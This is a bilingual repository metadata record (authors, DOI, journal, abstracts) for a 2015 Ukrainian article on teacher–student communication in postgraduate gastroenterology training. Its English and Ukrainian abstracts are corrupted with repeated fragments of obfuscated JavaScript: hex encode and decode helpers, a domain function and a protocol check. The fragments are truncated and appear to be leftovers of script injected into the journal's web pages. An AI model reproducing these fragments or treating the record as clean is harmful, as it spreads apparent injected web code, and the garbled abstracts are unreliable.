ROLE OF PEDAGOGICAL COMMUNICATION BETWEEN TEACHERS AND STUDENTS OF POST-GRADUATE TRAINING IN INTERNAL MEDICINE AND GASTROENTEROLOGY IN THE OPTIMIZATION OF THE EDUCATIONAL PROCESS
РОЛЬ ПЕДАГОГІЧНОГО СПІЛКУВАННЯ МІЖ ВИКЛАДАЧАМИ ТА СЛУХАЧАМИ КУРСІВ ПІСЛЯДИПЛОМНОЇ ПІДГОТОВКИ З ТЕРАПІЇ ТА ГАСТРОЕНТЕРОЛОГІЇ В ОПТИМІЗАЦІЇ НАВЧАЛЬНОГО ПРОЦЕСУ
dc.creator | Stepanov, Y. M. | |
dc.creator | Kononov, I. M. | |
dc.creator | Budzak, I. Y. | |
dc.creator | Kosynska, S. V. | |
dc.creator | Salenko, A. V. | |
dc.date | 2015-12-15 | |
dc.date.accessioned | 2019-08-26T19:43:41Z | |
dc.date.available | 2019-08-26T19:43:41Z | |
dc.identifier | https://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/5323 | |
dc.identifier | 10.11603/me.v0i4.5323 | |
dc.identifier.uri | https://repository.tdmu.edu.ua/handle/123456789/11463 | |
dc.description | The article is devoted to the psychology of relationships between teacher and doctors undergoing postgraduate training. We consider four types of relationships between the teacher and the listener. It is noted the importance of achieving the authority of the teacher in the eyes of the listeners. The article also shows the styles of pedagogical communication between the teacher and the listener. Separately, there are described the didactic principles of the educational process. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e | en-US |
dc.description | Стаття присвячена питанням психології взаємовідносин між викладачем та лікарями, що проходять післядипломне навчання. Розглянуті чотири типи взаємовідносин між викладачем і слухачем. Наголошено на важливості досягнення авторитету викладача в очах слухачів. Також в статті показані стилі педагогічного спілкування між викладачем і слухачем. Окремо описані дидактичні принципи навчального процесу.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e | uk-UA |
dc.format | application/pdf | |
dc.language | ukr | |
dc.publisher | Ternopil State Medical University | uk-UA |
dc.relation | https://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/5323/4892 | |
dc.rights | Авторське право (c) 2015 Медична освіта | uk-UA |
dc.source | Medical Education; No 4 (2015) | en-US |
dc.source | Медична освіта; № 4 (2015) | uk-UA |
dc.source | 2414-5998 | |
dc.source | 1681-2751 | |
dc.source | 10.11603/me.v0i4 | |
dc.title | ROLE OF PEDAGOGICAL COMMUNICATION BETWEEN TEACHERS AND STUDENTS OF POST-GRADUATE TRAINING IN INTERNAL MEDICINE AND GASTROENTEROLOGY IN THE OPTIMIZATION OF THE EDUCATIONAL PROCESS | en-US |
dc.title | РОЛЬ ПЕДАГОГІЧНОГО СПІЛКУВАННЯ МІЖ ВИКЛАДАЧАМИ ТА СЛУХАЧАМИ КУРСІВ ПІСЛЯДИПЛОМНОЇ ПІДГОТОВКИ З ТЕРАПІЇ ТА ГАСТРОЕНТЕРОЛОГІЇ В ОПТИМІЗАЦІЇ НАВЧАЛЬНОГО ПРОЦЕСУ | uk-UA |
dc.type | info:eu-repo/semantics/article | |
dc.type | info:eu-repo/semantics/publishedVersion |
Files in this item
Files | Size | Format | View |
---|---|---|---|
There are no files associated with this item. |